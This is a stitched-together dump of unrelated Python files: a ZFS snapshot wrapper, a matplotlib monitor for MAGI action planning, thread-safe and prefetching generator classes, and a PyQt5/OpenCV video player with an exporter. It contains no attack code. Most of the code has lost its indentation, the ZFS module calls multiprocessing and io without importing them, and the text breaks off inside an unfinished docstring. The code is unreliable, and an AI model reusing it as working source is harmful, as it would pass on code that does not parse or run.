import pathlib
import os
import typing
import libzfs
import zonys
import zonys.core
import zonys.core.zfs
import zonys.core.zfs.dataset
import zonys.core.zfs.file_system
class AlreadyExistsError(RuntimeError):
    def __init__(self, identifier):
        super().__init__("Snapshot {} already exists".format(str(identifier)))
class NotExistError(RuntimeError):
def __init__(self, handle):
super().__init__("Snapshot {} does not exist".format(str(handle)))
class DescriptorIdentifierNotMatch(RuntimeError):
pass
class InvalidDescriptorError(RuntimeError):
pass
class InvalidIdentifierError(RuntimeError):
pass
class Identifier:
def __init__(self, *args):
file_system_identifier = None
name = None
if len(args) == 1:
if isinstance(args[0], str):
values = args[0].split("@")
if len(values) != 2:
raise InvalidIdentifierError()
file_system_identifier = zonys.core.zfs.file_system.Identifier(
values[0]
)
name = values[1]
elif len(args) == 2:
if isinstance(args[0], str) and isinstance(args[1], str):
file_system_identifier = zonys.core.zfs.file_system.Identifier(args[0])
name = args[1]
elif isinstance(args[0], list) and isinstance(args[1], str):
file_system_identifier = zonys.core.zfs.file_system.Identifier(args[0])
name = args[1]
elif isinstance(
args[0], zonys.core.zfs.file_system.Identifier
) and isinstance(args[1], str):
file_system_identifier = args[0]
name = args[1]
if file_system_identifier is None or name is None:
raise InvalidIdentifierError()
self.__file_system_identifier = file_system_identifier
self.__name = name
def __str__(self):
return "{}@{}".format(str(self.file_system_identifier), self.name)
@property
def file_system_identifier(self):
return self.__file_system_identifier
@property
def name(self):
return self.__name
@property
def first(self):
return self.file_system_identifier.first
    def exists(self):
        try:
            self.open()
            return True
        except NotExistError:
            return False
def create(self):
if self.exists():
raise AlreadyExistsError(self)
libzfs.ZFS().get_dataset(str(self.file_system_identifier)).snapshot(str(self))
return Handle(
libzfs.ZFS().get_snapshot(str(self)),
self,
)
def open(self):
try:
return Handle(libzfs.ZFS().get_snapshot(str(self)), self)
        except Exception:
raise NotExistError(self)
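# Illustrative usage sketch (requires a real ZFS pool; "tank/zones" is a hypothetical
# file system name, not something this module provides):
#
#   identifier = Identifier("tank/zones@initial")      # or Identifier("tank/zones", "initial")
#   handle = identifier.open() if identifier.exists() else identifier.create()
#   print(handle.path)                                 # .../tank/zones/.zfs/snapshot/initial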
class Handle(zonys.core.zfs.dataset.Handle):
def __init__(self, descriptor, identifier=None):
super().__init__(descriptor)
if identifier is None:
identifier = Identifier(self._descriptor.name)
elif self._descriptor.name != str(identifier):
raise DescriptorIdentifierNotMatch(self)
self.__identifier = identifier
@property
def identifier(self):
return self.__identifier
@property
def file_system(self):
return self.identifier.file_system_identifier.open()
@property
def path(self) -> pathlib.Path:
return self.file_system.path.joinpath(
".zfs",
"snapshot",
self.identifier.name,
)
def destroy(self):
self._descriptor.delete()
def clone(self, identifier):
self._descriptor.clone(str(identifier))
return identifier.open()
def rename(self, name: str):
self._descriptor.rename(name)
self.__identifier = Identifier(
self.__identifier.file_system_identifier,
name,
)
def send(
self,
target: typing.Any,
compress: bool = False,
):
flags = set()
if compress:
flags.add(
libzfs.SendFlag.COMPRESS,
)
        send = lambda x: self._descriptor.send(x, flags=flags)
if isinstance(target, int):
send(target)
else:
(destination, source) = os.pipe()
child_process = multiprocessing.Process(
target=Handle.__send_child, args=(send, destination, source)
)
child_process.start()
Handle.__send_parent(target, destination, source)
child_process.join()
@staticmethod
def __send_parent(
target: typing.Any,
destination: int,
source: int,
):
write = None
if isinstance(target, io.TextIOBase):
write = lambda x: target.write(str(x))
elif isinstance(target, io.RawIOBase):
write = target.write
else:
write = target.write
os.close(source)
while True:
data = os.read(destination, 8192)
if len(data) == 0:
break
write(data)
os.close(destination)
@staticmethod
def __send_child(
send: typing.Callable,
destination: int,
source: int,
):
os.close(destination)
send(source)
os.close(source)
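# Illustrative usage of Handle.send (hypothetical snapshot name; requires a real ZFS setup):
#
#   snapshot = Identifier("tank/zones@initial").open()
#   with open("/tmp/zones-initial.zfs", "wb") as stream:
#       snapshot.send(stream, compress=True)           # streams the snapshot through the helper pipe
#
#   # Passing an integer file descriptor instead of a file object skips the pipe and child process:
#   #   snapshot.send(os.open("/tmp/zones-initial.zfs", os.O_WRONLY | os.O_CREAT, 0o644))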
|
monitor.py
|
"""MAGI action monitor."""
from Queue import Queue
import threading
import matplotlib.pyplot as plt
import networkx as nx
import numpy as np
import pylab
def get_action_name(action):
"""
Get action name.
@param action: Action
@return action's string name
"""
action_name = action.get_name()
action_name = action_name.replace("_", "-")
if action.checkpoint:
action_name += " (Checkpoint)"
return action_name
class ActionResults(object):
"""Action status enum."""
# Unknown - result hasn't been reported yet
UNKNOWN = -1
# Planning for the action failed
FAILURE = 0
# Planning for the action succeeded and the solution
# is deterministic
DETERMINISTIC_SUCCESS = 1
# Planning for the action succeeded but the solution
# is non-deterministic
NONDETERMINISTIC_SUCCESS = 2
def get_color(result):
"""
Convert an action result to an RGB color.
@param result: ActionResults
@return a list of RGB values
"""
# Store colors for success, failure and unknown
# colors taken from the palettable package
# https://jiffyclub.github.io/palettable/
# colorbrewer = palettable.colorbrewer
color_map = {
ActionResults.FAILURE: [215, 48, 39], # red
ActionResults.DETERMINISTIC_SUCCESS: [49, 130, 189], # blue
ActionResults.NONDETERMINISTIC_SUCCESS: [26, 152, 80] # green
}
color = color_map.get(result, [240, 240, 240]) # unknown=grey
return [float(c) / 255. for c in color]
class MonitorUpdateRequest(object):
"""Used to indicate to the drawing thread that data has been updated."""
pass
class MonitorStopRequest(object):
"""Used to indicate the drawing thread should close the window and exit."""
pass
class ActionMonitor(object):
"""Visualizer for action planning progress."""
def __init__(self):
# Create a lock for thread safety
self.lock = threading.Lock()
# Create an internal queue to be used by the internal
        # draw and update thread
self.update_request_queue = Queue()
# Setup internal data structures
self.reset()
# Spin off drawing thread
self.drawing_thread = threading.Thread(target=self._draw)
self.drawing_thread.start()
def stop(self):
"""Stop visualizing progress."""
self.update_request_queue.put(MonitorStopRequest())
self.drawing_thread.join()
def _draw(self):
"""Keep calling _redraw until visualization stops."""
self.ax_graph = pylab.subplot(121)
self.ax_bar = pylab.subplot(122)
plt.show(block=False)
plt.rcParams.update({
'font.family': 'serif',
'font.serif': 'Computer Modern Roman',
'font.size': 12,
'legend.fontsize': 12,
'legend.labelspacing': 0,
'text.usetex': True,
'savefig.dpi': 300
})
# Set the window title
plt.gcf().canvas.set_window_title('HGPC Monitor')
keep_running = True
while keep_running:
self._redraw()
req = self.update_request_queue.get()
keep_running = not isinstance(req, MonitorStopRequest)
plt.close()
def reset(self):
"""Reset visualization."""
self.lock.acquire()
try:
self.node_metadata = {}
self.current_planning = None # planning
self.current_post_processing = None # post processing
self.current_executing = None # executing
self.planned_actions = [
] # Keep track of the actions in the order they are planned
self.active_actions = []
# Initialize a graph for the action ordering
self.G = nx.DiGraph(format='svg')
finally:
self.lock.release()
def set_graph(self, G, node_map):
"""
Initialize graph.
@param G: networkx graph representing the relationship between actions
@param node_map: mapping from node name in G to action
"""
self.lock.acquire()
try:
self.G = G
for node in self.G.nodes():
if node not in self.node_metadata:
self.node_metadata[node] = {
'color': get_color(ActionResults.UNKNOWN),
'results': []
}
self.node_map = node_map
self.action_map = {v: k for k, v in node_map.iteritems()}
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def _draw_dot_plots(self):
"""Draw dot plots."""
# Clear the existing axis
self.ax_bar.cla()
categories = self.planned_actions
if len(categories) == 0:
return
# Build a set of nodes with a custom layout
G = nx.Graph()
node_pos = {}
label_map = {}
label_pos = {}
color_map = {}
node_spacing = 0.2
for idx, category in enumerate(categories):
# Add nodes for every result
results = self.node_metadata[category]['results']
for ridx, res in enumerate(results):
node_label = '%d_%d' % (idx, ridx)
G.add_node(node_label)
color_map[node_label] = get_color(res)
node_pos[node_label] = (0.2 * ridx, idx)
if len(results):
node_label = '%d_0' % (idx)
action = self.node_map[category]
label_map[node_label] = get_action_name(action)
label_pos[node_label] = (0.2 * len(results), idx)
nodesize = 50
fontsize = 10
max_x = max([0.0] + [v[0] for v in node_pos.values()])
label_pos = {
k: (max_x + node_spacing, v[1])
for k, v in label_pos.iteritems()
}
color_list = [color_map[a] for a in G.nodes()]
nx.draw_networkx_nodes(
G,
node_pos,
ax=self.ax_bar,
nodelist=G.nodes(),
node_color=color_list,
node_size=nodesize)
labels = nx.draw_networkx_labels(
G,
label_pos,
label_map,
ax=self.ax_bar,
font_size=fontsize,
font_family='serif',
horizontalalignment='left')
self.ax_bar.get_xaxis().set_visible(False)
self.ax_bar.get_yaxis().set_visible(False)
self.ax_bar.set_title('Planning Results by Action')
max_y = max([0.0] + [v[1] for v in node_pos.values()])
max_x = max([0.0] + [v[0] for v in node_pos.values()])
self.ax_bar.set_ylim((-1., max_y + 1))
self.ax_bar.set_xlim((-0.2, max_x + 1.5))
def _draw_bargraphs(self):
"""Draw bar graphs."""
def compute_success(results):
"""
Compute number of Actions that succeeded.
@param results: list of ActionResults
@return number of successes
"""
return sum([1 if r == ActionResults.DETERMINISTIC_SUCCESS or \
r == ActionResults.NONDETERMINISTIC_SUCCESS \
else 0 for r in results])
def compute_failures(results):
"""
Compute number of Actions that failed.
@param results: list of ActionResults
@return number of failures
"""
return len(results) - compute_success(results)
categories = self.planned_actions
if len(categories) == 0:
return
bar_height = 1.0
category_positions = np.arange(
bar_height * 1.5, 1.5 * bar_height * len(categories) + 0.1,
1.5 * bar_height)
failure_counts = [
compute_failures(self.node_metadata[c]['results'])
for c in categories
]
success_counts = [
compute_success(self.node_metadata[c]['results'])
for c in categories
]
plt.hold(False)
self.ax_bar.barh(
category_positions,
failure_counts,
align='center',
height=bar_height,
color=get_color(ActionResults.FAILURE),
lw=0)
plt.hold(True)
self.ax_bar.barh(
category_positions,
success_counts,
align='center',
height=bar_height,
color=get_color(ActionResults.NONDETERMINISTIC_SUCCESS),
lw=0)
self.ax_bar.set_yticks([])
for idx, category in enumerate(categories):
action = self.node_map[category]
self.ax_bar.text(
0.1,
category_positions[idx],
r'%s' % get_action_name(action),
va='center',
ha='left')
max_xval = max(
[len(c['results']) for c in self.node_metadata.itervalues()])
delta = 1 if max_xval < 10 else 5
self.ax_bar.set_xticks(range(0, max_xval, delta) + [max_xval])
self.ax_bar.set_xlabel('Planning Counts')
self.ax_bar.set_xlim((0, max(failure_counts) + 0.5))
self.ax_bar.set_ylim([
category_positions[0] - bar_height, category_positions[-1] +
bar_height
])
# Simplify axis
self.ax_bar.set_frame_on(False)
xmin, xmax = self.ax_bar.get_xaxis().get_view_interval()
ymin, ymax = self.ax_bar.get_yaxis().get_view_interval()
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmin), (ymin, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmax, xmax), (ymin, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmax), (ymin, ymin),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.add_artist(
plt.Line2D(
(xmin, xmax), (ymax, ymax),
color='black',
linewidth=1,
zorder=100,
clip_on=False))
self.ax_bar.get_yaxis().tick_left()
self.ax_bar.get_xaxis().tick_bottom()
def _compute_layout(self,
node,
branch_id,
pos_layout,
label_layout,
depth=0):
"""
Recursively compute the node layout.
@param node: node id to compute the layout with
@param branch_id: branch id for layout
@param pos_layout: dictionary of node positions
@param label_layout: dictionary of label positions
@param depth: depth of current node from root nodes
"""
if node not in pos_layout:
pos_layout[node] = (branch_id, depth)
label_layout[node] = (branch_id, depth)
children = self.G.successors(node)
for idx, succ in enumerate(children):
self._compute_layout(succ, branch_id + 2. * idx / (1.0 * depth + 5.0),
pos_layout, label_layout, depth + 1)
def _draw_graph(self):
"""Draw the planning tree as a graph."""
# Clear the existing axis
self.ax_graph.cla()
# Grab all the nodes and setup a unique layout
nodelist = self.G.nodes()
if len(nodelist) == 0:
# nothing to draw yet
return
small_nodesize = 2000 / len(nodelist)
large_nodesize = max(200, 2. * small_nodesize)
fontsize = 10
color_list = [self.node_metadata[a]['color'] for a in nodelist]
size_list = [large_nodesize if a == self.current_planning or \
a == self.current_post_processing or \
a == self.current_executing
else small_nodesize for a in nodelist]
label_dict = {a: "" for a in nodelist}
if self.current_planning is not None:
action = self.node_map[self.current_planning]
label_dict[self.current_planning] = '%s' % get_action_name(action)
if self.current_post_processing is not None and self.current_post_processing in label_dict:
action = self.node_map[self.current_post_processing]
label_dict[
self.
current_post_processing] = '%s (post-processing)' % get_action_name(
action)
if self.current_executing is not None and self.current_executing in label_dict:
action = self.node_map[self.current_executing]
label_dict[
self.current_executing] = '%s (executing)' % get_action_name(
action)
fontsize_list = [
fontsize * 2. if a == self.current_planning else fontsize
for a in nodelist
]
root_nodes = [n for n in self.G.nodes() if self.G.in_degree(n) == 0]
node_pos = dict()
label_pos = dict()
for idx, node in enumerate(root_nodes):
self._compute_layout(node, 0.2 * idx, node_pos, label_pos)
max_out_degree = max([
max(self.G.in_degree(n), self.G.out_degree(n))
for n in self.G.nodes()
])
for key, val in label_pos.iteritems():
label_pos[key] = (0.2 * max_out_degree + 0.1, val[1])
nx.draw_networkx_nodes(
self.G,
node_pos,
ax=self.ax_graph,
nodelist=self.G.nodes(),
node_color=color_list,
node_size=size_list)
nx.draw_networkx_edges(
self.G,
node_pos,
ax=self.ax_graph,
edgelist=self.G.edges(),
edge_color='k',
width=1.,
alpha=0.5)
nx.draw_networkx_labels(
self.G,
label_pos,
label_dict,
ax=self.ax_graph,
font_size=fontsize,
font_family='serif',
horizontalalignment='left')
self.ax_graph.get_xaxis().set_visible(False)
self.ax_graph.get_yaxis().set_visible(False)
self.ax_graph.set_title('Planning Progress')
max_y = max([v[1] for v in node_pos.values()])
self.ax_graph.set_ylim((-1., max_y + 1))
self.ax_graph.set_xlim((-0.2, max_out_degree + 0.5))
def _redraw(self):
"""Redraw the graphs. Should be called when any metadata is updated."""
self._draw_graph()
self._draw_dot_plots()
pylab.draw()
def set_planning_action(self, action):
"""
Mark the action that is currently being planned by the system.
@param action: Action currently being planned
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being planned
self.current_planning = node_id
if node_id is not None and node_id not in self.planned_actions:
self.planned_actions.append(node_id)
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def set_post_processing_action(self, action):
"""
Mark the action that is currently being postprocessed by the system.
@param action: Action currently being postprocessed
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being post-processed
self.current_post_processing = node_id
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def set_executing_action(self, action):
"""
Mark the action that is currently being executed by the system.
@param action: Action currently being executed
"""
self.lock.acquire()
try:
# Get the node id in the graph for this action
node_id = self.action_map.get(action, None)
# Mark this action as currently being executed
self.current_executing = node_id
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
def update(self, action, success, deterministic):
"""
Update the counts on success or failed planning for the action.
@param action: Action to update
@param success: True if a plan was successfully generated for the Action
@param deterministic: True if the method to solve the action is
deterministic
"""
self.lock.acquire()
try:
node_id = self.action_map[action]
if node_id not in self.node_metadata:
self.node_metadata[node_id] = {
'color': get_color(ActionResults.UNKNOWN),
'results': []
}
if success:
if deterministic:
result = ActionResults.DETERMINISTIC_SUCCESS
else:
result = ActionResults.NONDETERMINISTIC_SUCCESS
else:
result = ActionResults.FAILURE
self.node_metadata[node_id]['results'] += [result]
self.node_metadata[node_id]['color'] = get_color(result)
self.update_request_queue.put(MonitorUpdateRequest())
finally:
self.lock.release()
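# Illustrative usage sketch (the graph G, node_map and action objects below are hypothetical
# placeholders; in practice they come from the MAGI planner):
#
#   monitor = ActionMonitor()
#   monitor.set_graph(G, node_map)                       # networkx DiGraph plus {node_id: action}
#   monitor.set_planning_action(action)
#   monitor.update(action, success=True, deterministic=False)
#   monitor.set_executing_action(action)
#   monitor.stop()                                       # closes the window and joins the drawing thread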
|
generator.py
|
import logging
import threading
from queue import Queue
from typing import Any, Iterable
logger = logging.getLogger(__name__)
class ThreadSafeGen:
"""
Wraps generators to make them thread safe
"""
def __init__(self, iterable: Iterable[Any]):
"""
"""
self.iterable = iterable
self.lock = threading.Lock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
return next(self.iterable)
class PrefetchGenerator:
"""
    Applies functions asynchronously to the output of a generator.
Useful for modifying the generator results based on data from a network
"""
def __init__(self, data: Iterable[Any], prefetch_limit=20, num_executors=4):
if isinstance(data, (list, tuple)):
self._data = (r for r in data)
else:
self._data = data
self.queue = Queue(prefetch_limit)
self._data = ThreadSafeGen(self._data)
self.completed_threads = 0
        # The generator can only be iterated over once; this flag stops a second pass from blocking forever on queue.get.
self.done = False
self.num_executors = num_executors
self.threads = [
threading.Thread(target=self.fill_queue)
for _ in range(num_executors)
]
for thread in self.threads:
thread.daemon = True
thread.start()
def _process(self, value) -> Any:
raise NotImplementedError("Abstract method needs to be implemented")
def fill_queue(self):
try:
for value in self._data:
value = self._process(value)
if value is None:
raise ValueError("Unexpected None")
self.queue.put(value)
except Exception as e:
logger.warning("Unexpected exception while filling the queue. %r",
e)
finally:
self.queue.put(None)
def __iter__(self):
return self
def __next__(self) -> Any:
if self.done:
raise StopIteration
value = self.queue.get()
while value is None:
self.completed_threads += 1
if self.completed_threads == self.num_executors:
self.done = True
for thread in self.threads:
thread.join()
raise StopIteration
value = self.queue.get()
return value
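# Minimal usage sketch. PrefetchGenerator is abstract (_process must be overridden); the
# subclass and the __main__ guard below are illustrative only and have no effect on import.
class _SquaringPrefetchGenerator(PrefetchGenerator):
    """Example subclass that squares each value on the worker threads."""

    def _process(self, value) -> Any:
        return value * value


if __name__ == "__main__":
    # Results are prefetched up to 5 at a time by 2 worker threads; with more than one
    # executor the output order is not guaranteed.
    for squared in _SquaringPrefetchGenerator(list(range(10)), prefetch_limit=5, num_executors=2):
        print(squared)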
|
Video copy.py
|
from PyQt5 import QtGui
from PyQt5.QtCore import QDir, QEvent, QObject, QSize, QUrl, Qt, QThread, pyqtSignal, QMutex
from PyQt5.QtMultimedia import QMediaContent, QMediaPlayer
from PyQt5.QtMultimediaWidgets import QVideoWidget
from PyQt5.QtWidgets import QDockWidget, QFileDialog, QHBoxLayout, QLabel, QPushButton, QSlider, QStackedLayout, QWidget, QVBoxLayout, QProgressBar
from PyQt5.QtGui import QCursor, QFont, QImage, QPixmap
import cv2, os, shutil, atexit, numpy, time
from BlurObject import *
from Cursor import Cursor
class VideoThread(QThread):
changePixmap = pyqtSignal(QImage)
newFrame = pyqtSignal(int, numpy.ndarray)
stateChanged = pyqtSignal(bool) # True for playing started. False for playing stopped
positionChanged = pyqtSignal(int)
def __init__(self, parent=None, video=None):
super().__init__(parent)
self.__kill = False
self.mutex = QMutex()
self.__exporter = None
        if video is None:
            raise Exception("Must provide a video")
        self.video = video
self.fps = self.video.get(cv2.CAP_PROP_FPS)
self.resolution = self.video.get(cv2.CAP_PROP_FRAME_WIDTH), self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.output_resolution = self.resolution
# play state
self.number_of_frames = int(self.video.get(cv2.CAP_PROP_FRAME_COUNT))
self.current_frame = 0
self.__is_playing = False
self.__is_exporting = False
self.__exportWorker = None
self.__exportThread = None
self.__frame = None
@property
def playing(self):
return self.__is_playing
@property
def frame(self):
return self.__frame
@property
def duration(self):
return self.number_of_frames / self.fps
def run(self):
ret, frame = self.step()
self.render_frame()
while not self.__kill:
while not self.__kill and ret and self.playing and not self.__is_exporting:
self.render_frame()
# Wait and get next frame
time.sleep(1/self.fps) # TODO: account for processing time
if (self.current_frame >= self.number_of_frames-1):
self.pause()
else:
ret, frame = self.step()
# while not self.__kill and ret and self.__is_exporting:
# print("Exporting Frame", self.current_frame, "of", self.number_of_frames-1)
# if (self.current_frame >= self.number_of_frames-1):
# self.__is_exporting = False
# self.__finishExport()
# print("Export done no ret failure :)")
# else:
# ret, frame = self.step()
# self.__export_progress_bar.setValue(self.current_frame)
# if not ret:
# print("No return during export at frame {} / {}".format(self.current_frame-1, self.number_of_frames-1))
# ret = True
# self.__is_exporting = False
# self.__finishExport()
# print("Export done")
# # break
while not self.__kill and not self.playing and not self.__is_exporting:
time.sleep(1/self.fps) # do nothing
print("Video Thread Closing")
def export(self, path, progressbar):
if self.__is_exporting or self.__exportWorker is not None or self.__exportThread is not None:
raise Exception("Must wait until previous export is finished")
self.__is_exporting = True
self.__exportWorker = Exporter(progressbar, self, path)
self.__exportThread = QThread()
self.__exportWorker.moveToThread(self.__exportThread)
self.__exportWorker.start()
self.__exportWorker.exportComplete.connect(self.__export_end)
# self.__exportWorker.start()
def __export_end(self):
self.__exportWorker.kill()
self.__exportThread.terminate()
self.__exportThread.wait()
self.__is_exporting = False
self.__exportWorker = None
self.__exportThread = None
# def __finishExport(self):
# print("Render loop closed")
# # Close writer and remove listeners
# self.__exporter.release()
# self.__exporter = None
# self.__is_exporting = False
# self.newFrame.disconnect(self.__exportFrame)
# print("Writer Closed")
# self.set_frame(self.__export_start_position)
# # remove progress bar
# self.__export_progress_bar.setValue(self.number_of_frames)
# self.__export_progress_bar.parent().layout().removeWidget(self.__export_progress_bar)
# self.__export_progress_bar.setParent(None)
# self.__export_progress_bar.deleteLater()
# def export(self, path, progressbar):
# print("Exporting to", path)
# # Get export information and video writer
# self.__export_start_position = self.current_frame
# resolution = tuple(map(int, self.resolution))
# self.__exporter = cv2.VideoWriter(
# path,
# cv2.VideoWriter_fourcc(*"X264"),
# self.fps,
# resolution)
# # Move video to beginning and listen for frames to export
# self.pause()
# self.newFrame.connect(self.__exportFrame)
# self.set_frame(0)
# self.positionChanged.emit(self.current_frame)
# # Create progress bar
# self.__export_progress_bar = progressbar
# self.__export_progress_bar.setMaximum(self.number_of_frames)
# self.__export_progress_bar.setValue(0)
# # Read first frame
# self.step()
# self.__is_exporting = True # causes thread to start exporting
# def __exportFrame(self, index, frame):
# if (self.__exporter != None):
# self.mutex.lock()
# self.__exporter.write(frame)
# self.mutex.unlock()
def play(self):
if self.playing:
pass
else:
print("Thread playing")
if self.current_frame >= self.number_of_frames-1:
self.set_frame(0)
self.__is_playing = True
self.stateChanged.emit(self.playing)
def pause(self):
if not self.playing:
pass
else:
print("Thread Pausing")
self.__is_playing = False
self.stateChanged.emit(self.playing)
def step(self):
self.mutex.lock()
ret, self.__frame = self.video.read()
self.mutex.unlock()
self.current_frame += 1
if ret:
self.mutex.lock()
self.newFrame.emit(self.current_frame, self.__frame)
self.mutex.unlock()
return (ret, self.__frame)
def render_frame(self):
self.positionChanged.emit(self.current_frame)
rgb = cv2.cvtColor(self.__frame, cv2.COLOR_BGR2RGB)
# Convert into QT Format
h, w, ch = rgb.shape
bytesPerLine = ch*w
qtImage = QImage(rgb, w, h, bytesPerLine, QImage.Format_RGB888)
scaled = qtImage.scaled(self.output_resolution[0], self.output_resolution[1], Qt.KeepAspectRatio)
self.changePixmap.emit(scaled) # emit event
def set_frame(self, frame_index):
if (0 <= frame_index < self.number_of_frames):
self.mutex.lock()
self.current_frame = frame_index
self.video.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, self.__frame = self.video.read()
self.mutex.unlock()
self.newFrame.emit(self.current_frame, self.__frame)
self.render_frame()
else:
raise Exception("index {} is out of the video bounds 0 -> {}".format(frame_index, self.number_of_frames))
def reblit(self):
self.set_frame(self.current_frame)
def rerender(self):
self.render_frame()
def updateSize(self, x, y):
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x/aspect_ratio
self.output_resolution = [x, y]
print("Request to update resolution of {} video ({} aspect ratio) to {} ({} aspect ratio).\n\tActually set to {}".format(
self.resolution, aspect_ratio,
(x, y), x/y,
self.output_resolution
))
def kill(self):
self.__kill = True
if self.__exportWorker is not None:
self.__exportWorker.kill()
if self.__exportThread is not None:
self.__exportThread.terminate()
self.__exportThread.wait()
self.terminate()
self.wait()
class Exporter(QThread):
exportComplete = pyqtSignal()
def __init__(self, progressbar: QProgressBar, videoObject: VideoThread, path: str):
super().__init__()
self.progressbar = progressbar
self.video = videoObject
self.path = path
self.running = True
videoObject.newFrame.connect(self.exportFrame)
print("Initialized Exporter Thread")
def run(self):
ret, frame = self.video.step()
while ret and self.running:
# print("Exporting Frame", self.video.current_frame, "of", self.video.number_of_frames-1)
if (self.video.current_frame >= self.video.number_of_frames-1):
break
elif (not ret):
break
else:
ret, frame = self.video.step()
self.progressbar.setValue(self.video.current_frame)
# print("Frame", ret, self.__frame[:4])
self.__finishExport()
print("Export done")
def start(self):
super().start()
print("Exporting to", self.path)
print("Video has {} frames and lasts {} seconds".format(self.video.number_of_frames, self.video.duration))
# Get export information and video writer
self.__export_start_position = self.video.current_frame
resolution = tuple(map(int, self.video.resolution))
print("-"*50)
self.exporter = cv2.VideoWriter(
self.path,
cv2.VideoWriter_fourcc(*"X264"),
self.video.fps,
resolution)
# Move video to beginning and listen for frames to export
self.video.pause()
self.video.newFrame.connect(self.exportFrame)
self.video.set_frame(0)
# self.video.positionChanged.emit(self.video.current_frame)
# Create progress bar
self.progressbar.setMaximum(self.video.number_of_frames)
self.progressbar.setValue(0)
# if (ret):
# self.__run()
def __finishExport(self):
# Close writer and remove listeners
self.exporter.release()
self.exporter = None
self.video.newFrame.disconnect(self.exportFrame)
print("Writer Closed")
self.video.set_frame(self.__export_start_position)
# remove progress bar
self.progressbar.setValue(self.video.number_of_frames)
self.progressbar.parent().layout().removeWidget(self.progressbar)
self.progressbar.setParent(None)
self.progressbar.deleteLater()
self.exportComplete.emit()
def exportFrame(self, index, frame):
        if self.exporter is not None:
# print("Frame", index, frame[:4])
self.exporter.write(frame)
def kill(self):
self.running = False
self.terminate()
self.wait()
class Video(QLabel):
__sizeChanged = pyqtSignal(int, int)
newFrame = pyqtSignal(int, numpy.ndarray) # Outputs an OpenCV frame before it is rendered to GUI
positionChanged = pyqtSignal(int)
stateChanged = pyqtSignal(bool)
# Click Events
mouse_down = pyqtSignal(tuple)
mouse_move = pyqtSignal(tuple)
mouse_up = pyqtSignal(tuple)
mouse_over = pyqtSignal(tuple)
mouse_leave = pyqtSignal(tuple)
scroll_event = pyqtSignal(int, float, float)
def __init__(self, parent=None, video="./SampleVideo.mp4"):
super().__init__(parent)
self.setLayout(QVBoxLayout())
self.layout().setSpacing(0)
self.layout().setContentsMargins(0, 0, 0, 0)
self.setStyleSheet("border: #f00 solid 5px")
# Load Video
self._video_path = video
self.video = cv2.VideoCapture(video)
atexit.register(self.video.release)
self.__fps = self.video.get(cv2.CAP_PROP_FPS)
self.__resolution = self.video.get(cv2.CAP_PROP_FRAME_WIDTH), self.video.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.__number_of_frames = self.video.get(cv2.CAP_PROP_FRAME_COUNT)
print("Playing {} at {} fps and {}x{}".format(self._video_path, self.fps, self.resolution[0], self.resolution[1]))
# Video Reader
self.__image_update_thread = VideoThread(self, video=self.video)
self.__image_update_thread.changePixmap.connect(self.__setImage)
self.__image_update_thread.start()
self.__sizeChanged.connect(self.__image_update_thread.updateSize)
# Pass through signals
self.__image_update_thread.newFrame.connect(self.newFrame.emit, type=Qt.DirectConnection)
self.__image_update_thread.positionChanged.connect(self.positionChanged.emit)
self.__image_update_thread.stateChanged.connect(self.stateChanged.emit)
# Click Events
# self.mouse_down = pyqtSignal(Video, tuple)
# self.mouse_move = pyqtSignal(Video, tuple)
# self.mouse_up = pyqtSignal(Video, tuple)
self.setFixedWidth(self.resolution[0]/2)
# Blurring
self._blur_strands = []
self._blur_object = None
# Set Cursor
self.setCursor(Cursor())
# self.setCursor(QCursor(Qt.CrossCursor))
# cursor_size = self.cursor().pixmap().size()
# self.cursor().pixmap().load("../assets/erase.png")
# print("Cursor size",cursor_size.width(), cursor_size.height())
self.installEventFilter(self)
@property
def duration(self):
return self.number_of_frames / self.fps
@property
def number_of_frames(self):
return self.__number_of_frames
@property
def resolution(self):
return self.__resolution
@property
def fps(self):
return self.__fps
@property
def playing(self):
return self.__image_update_thread.playing
@property
def position(self):
return self.__image_update_thread.current_frame
@property
def frame(self):
return self.__image_update_thread.frame
def __setImage(self, image):
self.setPixmap(QPixmap.fromImage(image))
def export(self, path, progressbar):
self.__image_update_thread.export(path, progressbar)
def setFixedSize(self, x, y):
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x / aspect_ratio
super().setFixedSize(x, y)
self.__sizeChanged.emit(x, y)
def setMinimumSize(self, x, y):
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = x
y = x / aspect_ratio
super().setMinimumSize(x, y)
self.__sizeChanged.emit(x, y)
def setFixedHeight(self, h: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = h * aspect_ratio
y = h
self.setFixedSize(x, y)
def setFixedWidth(self, w: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = w
y = w / aspect_ratio
self.setFixedSize(x, y)
def setMinimumHeight(self, minh: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = minh * aspect_ratio
y = minh
self.setMinimumSize(x, y)
def setMinimumWidth(self, minw: int) -> None:
# Constrain size to video aspect ratio
aspect_ratio = self.resolution[0] / self.resolution[1]
x = minw
y = minw / aspect_ratio
self.setMinimumSize(x, y)
def play(self):
print("Playing")
self.__image_update_thread.play()
def pause(self):
print("Pausing")
self.__image_update_thread.pause()
def setPosition(self, frame):
self.__image_update_thread.set_frame(frame)
def reblit(self):
self.__image_update_thread.reblit()
def rerender(self):
self.__image_update_thread.rerender()
def convert_point_to_video(self, x, y):
'''
